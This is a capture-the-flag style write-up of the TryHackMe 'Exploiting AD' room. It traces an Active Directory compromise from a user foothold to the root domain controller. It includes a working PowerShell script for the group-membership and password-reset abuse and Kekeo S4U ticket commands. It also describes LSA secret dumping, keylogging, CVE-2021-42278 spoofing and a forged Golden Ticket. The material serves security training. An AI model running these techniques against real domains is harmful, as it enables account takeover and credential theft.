Exploiting Active Directory
As the fourth room in a five-part series, this room is a must-do for anyone looking to master the art of AD hacking. With in-depth coverage of a variety of topics, from escalation to pivoting, this room will equip you with the tools and techniques you need to navigate even the most complex AD environments.
While some of the screenshots may lack detailed explanations or in-depth discussion (this is primarily for my own reference), there's no denying the immense value this room offers to anyone looking to improve their AD hacking skills.
So why wait? Sign up for TryHackMe today and start exploring the Exploiting AD room. With so much to learn and discover, you're sure to come away with a wealth of knowledge and insights that will help you take your AD hacking skills to the next level.

In other TryHackMe rooms such as "Breaching AD" and "Lateral Movement," you will have learned how to gain initial access and obtain user credentials. The first part of "Exploiting AD" assumes we have already obtained user credentials and uses them with SharpHound (the collector) and BloodHound (the analysis tool) to enumerate the AD environment.

After we upload our SharpHound data into BloodHound we can see that Domain Users have GenericWrite over the IT Support group. This is our first step in a multi-step attack path. Since we have credentials for the user "Justin Barnes", we SSH into our foothold box and begin our approach.

GenericWrite on a group object covers its member attribute, so it allows us to add "Justin Barnes" to the IT Support group.


The great thing here is that BloodHound also shows a path from the IT Support group to the Tier 2 Admins group, which is always useful for escalating between groups. Since we added "Justin Barnes" to the IT Support group, we now hold the right to reset the passwords of users in the "Tier 2 Admins" group. Note that group membership is evaluated when a logon token or Kerberos ticket is issued, so the new membership only applies to sessions authenticated after the change.

Next, we need to enumerate the "Tier 2 Admins" group, choose a user, and reset their password.
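The whole chain above (verify the ACE, add ourselves to the group, pick a Tier 2 Admin, reset the password, prove the new credential works) as one added PowerShell example. This is not code from the write-up or from the TryHackMe room. It assumes the ActiveDirectory RSAT module is present on the foothold box, that the domain is za.tryhackme.loc (taken from the Kekeo commands later in the post), that the sAMAccountName of "Justin Barnes" is justin.barnes, and that the groups are named "IT Support" and "Tier 2 Admins"; the new password is a constructed value.

```powershell
# Added example (not code from the post or the TryHackMe room): abuse GenericWrite
# on the IT Support group, then the group's password-reset right over Tier 2 Admins,
# with the checks a practitioner would add. Assumptions: the ActiveDirectory module
# is on the foothold box, the domain is za.tryhackme.loc, the sAMAccountName of
# "Justin Barnes" is justin.barnes, and the groups are "IT Support"/"Tier 2 Admins".
Import-Module ActiveDirectory

$Domain   = 'za.tryhackme.loc'
$Foothold = 'justin.barnes'   # assumed sAMAccountName of "Justin Barnes"
$Cred     = Get-Credential -Message "Password for $Domain\$Foothold"

# Pin one DC for every call: a change written to one DC is not visible on another
# until replication, which is the "wait for AD to sync" the post mentions.
$DC = [string](Get-ADDomainController -DomainName $Domain -Discover).HostName

# 1. Confirm what BloodHound showed: an Allow ACE giving Domain Users GenericWrite
#    (or broader) on the group object. Get-Acl uses the AD: drive the module creates
#    on a domain-joined host, so it runs as the current logon, not as $Cred.
$group = Get-ADGroup -Identity 'IT Support' -Server $DC -Credential $Cred
$acl   = Get-Acl -Path "AD:\$($group.DistinguishedName)"
$ace   = $acl.Access | Where-Object {
    $_.IdentityReference -like '*\Domain Users' -and
    $_.AccessControlType -eq 'Allow' -and
    $_.ActiveDirectoryRights -match 'GenericWrite|GenericAll|WriteProperty'
}
if (-not $ace) { throw "No write ACE for Domain Users on $($group.Name); the BloodHound data may be stale." }
$ace | Format-Table IdentityReference, ActiveDirectoryRights -AutoSize

# 2. GenericWrite covers the group's member attribute, so add ourselves and verify.
Add-ADGroupMember -Identity $group -Members $Foothold -Server $DC -Credential $Cred
$member = Get-ADGroupMember -Identity $group -Server $DC -Credential $Cred |
          Where-Object SamAccountName -eq $Foothold
if (-not $member) { throw "Add-ADGroupMember did not take effect on $DC" }
"Now a member of $($group.Name): $($member.SamAccountName)"

# 3. Pick a target in Tier 2 Admins. The membership written above is only in the PAC
#    of tickets issued after the change. Passing -Credential makes the AD cmdlets
#    authenticate afresh, so once the issuing DC has the change this works without
#    the logout the post describes (the author ran gpupdate /force and re-logged in).
$targets = Get-ADGroupMember -Identity 'Tier 2 Admins' -Server $DC -Credential $Cred |
           Where-Object objectClass -eq 'user'
$targets | Select-Object SamAccountName, DistinguishedName
$victim  = ($targets | Select-Object -First 1).SamAccountName   # the post chose t2_melaine.davies

# 4. Reset (not change) the password: -Reset exercises the Reset Password right, so the
#    old password is not required. The value must satisfy the domain password policy.
$NewPw = ConvertTo-SecureString 'Spring2024!Pivot' -AsPlainText -Force   # constructed value
Set-ADAccountPassword -Identity $victim -Reset -NewPassword $NewPw -Server $DC -Credential $Cred

# 5. Prove it: bind to AD as the victim with the new password.
$victimCred = New-Object System.Management.Automation.PSCredential("$Domain\$victim", $NewPw)
Get-ADUser -Identity $victim -Server $DC -Credential $victimCred |
    Select-Object SamAccountName, Enabled, DistinguishedName
```

Resetting a password is noisy (event 4724 on the DC, and the real user is locked out of their account), so on an engagement note the original state and coordinate with the client before step 4.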


Now that we have reset the password of "t2_melaine.davies", we will use that account later for Tier 2 Admin work. In the meantime, let us whip out Metasploit and see what we can do with our first box.




As you can see below, we now have a meterpreter session as "t2_melaine.davies". Note: in order to gain a shell as "t2_melaine.davies" I simply ran gpupdate /force, logged out of the box as "Justin Barnes", waited 10 minutes for AD to sync, and then used evil-winrm to gain a session on the THMWRK1 box as "t2_melaine.davies".


I was able to run getsystem and dump LSA secrets, which ultimately gave me the "svcIIS" account password. I've redacted it for obvious reasons. ;) But why do we want the "svcIIS" password? Using the "Get-NetUser" cmdlet from PowerSploit we can see that "svcIIS" is trusted for constrained delegation to the HTTP and WSMAN services on THMSERVER1. What's so special about that? An account that may delegate to those SPNs can request service tickets for THMSERVER1 in the name of other users (S4U), which is exactly the pivot we need to keep going up the chain.

But first we need to jump from THMWRK1 to THMSERVER1. But how?

Let's use Kekeo to request a TGT as "svcIIS" and then, via S4U, service tickets for THMSERVER1 in the name of a user pulled from the Tier 1 Admins group, and then use Mimikatz to load those tickets into memory.
On our foothold box "THMWRK1" let's run Get-ADGroupMember -Identity "Tier 1 Admins" and choose a Tier 1 user.



tgs::s4u /tgt:[email protected][email protected] /user:t1_steven.blake /service:http/THMSERVER1.za.tryhackme.loc
tgs::s4u /tgt:[email protected][email protected] /user:t1_steven.blake /service:wsman/THMSERVER1.za.tryhackme.loc

After we have a session on THMSERVER1 we can create an msfvenom payload and pull it down onto the host for a better foothold and more flexibility with additional modules.



After gaining access to THMSERVER1 we've successfully escalated to SYSTEM, as seen above. Next, let's see if we can migrate into the explorer.exe process of user "trevor" and hopefully capture his keystrokes.

Next, let's download PasswordDatabase.kdbx and open it with KeePassX.




Looks like we now have the svcServMan password, which we can use to pivot to THMSERVER2!


After we gained access to THMSERVER2, I decided to cut to the chase and go straight to "Sam the Admin" (sAMAccountName spoofing).

Next on our to-do list is to jump from THMCHILDDC (the child domain's DC) to THMROOTDC (the root domain's DC).

First, we need the SID of the root domain that THMROOTDC serves, since a cross-domain Golden Ticket carries the root domain's Enterprise Admins SID (root domain SID plus RID 519) in its SID history. If we jump back over to THMSERVER2 we can grab it using the AD module on that host.

Since we already have a session on the child DC from exploiting CVE-2021-42278 (sAMAccountName spoofing), we can create an msfvenom payload and grab a meterpreter session there.



Time for the Golden Ticket!! With the child domain's krbtgt hash and the root domain's SID, we can forge a TGT for za.tryhackme.loc whose SID history includes the root domain's Enterprise Admins group, which the root DC will accept because SID filtering is not enforced on parent-child trusts within a forest.

As you can see, we have command execution on THMROOTDC!!!
